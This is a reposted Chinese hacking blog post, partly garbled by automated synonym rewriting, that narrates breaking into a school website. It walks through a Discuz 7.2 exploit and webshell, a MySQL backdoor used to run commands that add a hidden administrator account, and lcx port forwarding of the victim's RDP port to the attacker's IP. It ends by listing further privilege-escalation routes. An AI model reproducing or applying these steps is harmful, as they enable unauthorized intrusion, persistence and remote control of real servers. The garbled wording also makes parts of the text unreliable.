快速实例攻击某学校网站历程[网络技术]
本文“快速实例攻击某学校网站历程[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
本日某**发我一个学校网站,说10分钟咋样.闲来瞧瞧!
1、取Webshell之旅
从整体看上去MS是帝国CMS,固然近来0day风行但帝国CMS还真没啥办法呢!硬的不行,咱就来旁注吧!从目标站上看上去,有很多都是同类的CMS站.有两个论坛,一个dz7.0据说有漏洞暂时还没人放出.另一个DZ7.2,爆发0day.于是乎,目标先锁定这个dz 7.2.
1、拿出dz 7.2 exp,测试之.
2、注入成功,一句话地址forumdata/cache/usergroup_01.php
3、上传webshell.
4、三分钟拿下webhsell.上去找找了还没发现目标站的目录,翻开配置文件看看.本来是root.哦耶!提权之!
2、提权之旅
先用mysqldoor试试,上传之.
引言:Mysql BackDoor是一款针对PHP+Mysql服务器开辟的后门,后门安装后为Mysql增添一个可以履行系统号令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.
2、安装成功,select state("net user")履行号令net user 成功返回!
3、这样就有system权限了,select state("net user admin udb311 /add")用户增添上;
4、select state("net localgroup administrators admin /add")用户晋升至管理组,此时administrator权限到手.
5、查看远程终端登录端口.
select state("netstat -ano") 查看端口,3389开启之!速衔接,无法衔接.
6、再看看端口情形,本来是内网IP.
3、lcx内网端口转发
引言:Lcx.EⅩE是一个端口转发工具,相当于把安全A上的3389端口转发到具有外网IP地址的B机上,这样衔接B机的3389端口就相当于链接A机的3389端口.Lcx程序多用于被掌握计算机(安全)处于内网的情形,被掌握机大概中了安全程序,固然可以举行掌握,但还是没有利用远程终端登陆到本机举行管理便利,因此在很多情形下,城市千方百计在被掌握计算机上开启3389端口,然后通过lcx等程序举行端口转发,进而在本地衔接到被掌握计算机的远程终端并举行管理和利用.
1、lcx上传之,再用mysqldoor履行.
2、在mysqldoor号令行下履行d:/**/**/lcx.EⅩE -slave 58.221.xx.xx(自己IP) 51 192.168.201.2 3389
3、在本地 lcx.EⅩE -listen 51 3389
因为我也是内网用户,还要做端口映射之.
4、内网映射
引言:端口映射就是将主机的IP地址的一个端口映射到局域网中一台机械,当用户拜候这个IP的这个端口时,服务器自动将恳求映射到对应局域网分机 .
进入路由器,因为我的路由器支持NAT 转发.下面我直接把51端口转发到公网.
成功禁用词语到51端口的数据返回.
5、成功登录
远程桌面衔接之192.168.10.254(本地IP),假如碰到不能直接衔接本地的IP可衔接127.0.0.1.
浸透完毕!
总结:
提醒:此服务器管理员,有三个方面可以举行提权.
1、安装的serv-u,没有降权.通过溢出可以提权!
2、安装了搜狗拼音,替换文件可以到达提权!
3、利用了root用户,通过udf.dll或backdoor可以提权!别的,root还有多种提权办法,请注意咯!
本文针对内网浸透和内网映射做出具体阐明.对内网浸透的朋友们会有所帮忙,不足之处还请指出!
以上是“快速实例攻击某学校网站历程[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
- ·上一篇文章:关键字放在网页的什么地方效果最好
- ·下一篇文章:找不到漏洞时的攻击本领
- ·中查找“快速实例攻击某学校网站历程”更多相关内容
- ·中查找“快速实例攻击某学校网站历程”更多相关内容